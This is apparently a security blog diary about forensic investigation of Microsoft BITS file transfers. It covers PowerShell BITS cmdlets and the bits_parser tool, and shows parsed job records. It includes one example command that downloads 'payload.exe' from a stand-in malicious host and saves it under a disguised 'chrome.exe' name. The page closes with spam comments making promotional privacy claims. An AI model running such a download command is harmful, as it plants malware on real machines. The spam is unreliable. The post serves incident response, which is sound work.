Investigating Microsoft BITS Activity
Microsoft BITS (“Background Intelligent Transfer Service”) is a tool present[1] in all modern Microsoft Windows operating systems. As the name says, you can see it as a "curl" or "wget" tool for Windows. It helps to transfer files between a server and a client but it also has plenty of interesting features. Such a tool, being always available, is priceless for attackers. They started to use BITS to grab malicious contents from the Internet. In May 2016, I wrote a diary about a piece of malware that already used BITS[2]. But the tool has many more interesting features (for the good as well the bad guys) like executing a command once the download completed, it can also control the bandwidth used (to remain stealthy).
Previously, there was a command ‘bitsadmin’ available to manage transfers with BITS but it has been deprecated and replaced by a complete integration with PowerShell:
PS C:\> Import-Module BitsTransfer PS C:\> Get-Command *-bits* CommandType Name ----------- ---- Cmdlet Add-BitsFile Cmdlet Complete-BitsTransfer Cmdlet Get-BitsTransfer Cmdlet Remove-BitsTransfer Cmdlet Resume-BitsTransfer Cmdlet Set-BitsTransfer Cmdlet Start-BitsTransfer Cmdlet Suspend-BitsTransfer yield from self.parse()
To create a BITS jobs, just do this:
Start-BitsTransfer -Source http://malicious.server/payload.exe -Destination %APPDATA%/chrome.exe
Note that BITS is used by many third-party tools to download their own updates like AcrobatReader.
BITS is fully integrated within the Microsoft OS and generates events in the EventLog but everybody knows that such pieces of evidence can be easily cleared by the attackers. How to investigate an incident involving file transfer performed via BITS? French researchers from ANSSI[3] had a look at the queue manager files created by BITS. Such files are stored in %%ALLUSERSPROFILE%%\Microsoft\Network\Downloader (Administrative rights are required to access them):
C:\ProgramData\Microsoft\Network\Downloader>dir Volume in drive C has no label. Volume Serial Number is CC68-E0A2 Directory of C:\ProgramData\Microsoft\Network\Downloader 03/10/2016 18:04 <DIR> . 03/10/2016 18:04 <DIR> .. 25/01/2018 18:18 4.194.304 qmgr0.dat 25/01/2018 18:18 4.194.304 qmgr1.dat 2 File(s) 8.388.608 bytes 2 Dir(s) 15.106.048 bytes free
Microsoft does not communicate a lot of information about the format of the file and the ANSSI researchers did a nice job to reverse engineer the format and to create a tool to parse them. The tool is called bits_parser[4].
Let’s install it using pip and check the available options:
# bits_parser -h Extract BITS jobs from QMGR queue or disk image to CSV file. Usage: bits_parser [options] [-o OUTPUT] FILE Options: --no-carving Disable carving. --disk-image, -i Data input is a disk image. --radiance=VALUE Radiance in kB. [default: 2048] --skip-sampling Skip sampling and load file in memory. --checkpoint=PATH Store disk checkpoint file. --out=OUTPUT, -o OUTPUT Write result to OUTPUT [default: stdout] --verbose, -v More verbosity. --debug Display debug messages. --help, -h Show this screen. --version Show version. # bits_parser -o test.csv qmgr0.dat
Here are two examples of BITS jobs results (one carved, the second not). I reformated the CSV file for more readibility:
job_id | fd80a460-ec19-421a-a014-11d4881c1e5c |
name | WU Client Download |
desc | |
type | download |
priority | high |
sid | S-1-5-18 |
state | suspended |
cmd | |
args | |
file_count | 1 |
file_id | 0 |
dest_fn | C:\Windows\SoftwareDistribution\Download\087417a132f6f4ad6d49797863745d14\374d740218c5a5bdb142754037ca67cce76d6bbf |
src_fn | http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/01/am_delta_374d740218c5a5bdb142754037ca67cce76d6bbf.exe |
tmp_fn | C:\Windows\SoftwareDistribution\Download\087417a132f6f4ad6d49797863745d14\BIT687A.tmp |
download_size | 0 |
transfer_size | 2183440 |
drive | C:\ |
vol_guid | \\?\Volume{7544f408-ea0d-11e0-8a32-806e6f6e6963}\ |
ctime | 2018-01-24 20:36:07.198336, |
mtime | 2018-01-25 17:06:37.530274 |
other_time0 | 2018-01-25 17:06:37.530274 |
other_time1 | 2018-01-25 17:06:37.530274 |
other_tome2 | 2018-04-25 17:06:37.530274 |
carved | False |
job_id | |
name | |
desc | |
type | |
priority | |
sid | |
state | |
cmd | |
args | 1 |
file_count | 0 |
file_id | 0 |
dest_fn |
C:\Windows\SoftwareDistribution\Download\76f6d3e62f7962922156b604ab456dd4\c0e8dfa3b6ae8d77fb171525b9491311a53a1b85 |
src_fn |
http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/01/nis_delta_patch_c0e8dfa3b6ae8d77fb171525b9491311a53a1b85.exe |
tmp_fn | C:\Windows\SoftwareDistribution\Download\76f6d3e62f7962922156b604ab456dd4\BIT6958.tmp |
download_size | 0 |
transfer_size | 276240 |
drive | C:\ |
vol_guid | \\?\Volume{7544f408-ea0d-11e0-8a32-806e6f6e6963}\ |
ctime | 2018-01-24 20:36:07.417086 |
mtime | 2018-01-25 17:10:44.264648 |
other_time0 | 2018-01-25 17:06:48.764648 |
other_time1 |
2018-01-25 17:06:48.764648 |
other_tome2 | 2018-04-25 17:06:48.764648 |
carved | True |
Good to know, BITS uses a dedicated User-Agent string, easy to spot in our log files:
Microsoft BITS/x.x
"x.x" is the version, currently 7.5.
If you're performing investigations involving Windows systems, you should definitively keep an eye on BITS and add bits_parser in your toolbox.
[1] https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799(v=vs.85).aspx
[2] https://isc.sans.edu/forums/diary/Microsoft+BITS+Used+to+Download+Payloads/21027
[3] http://www.ssi.gouv.fr/en/
[4] https://github.com/ANSSI-FR/bits_parser
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago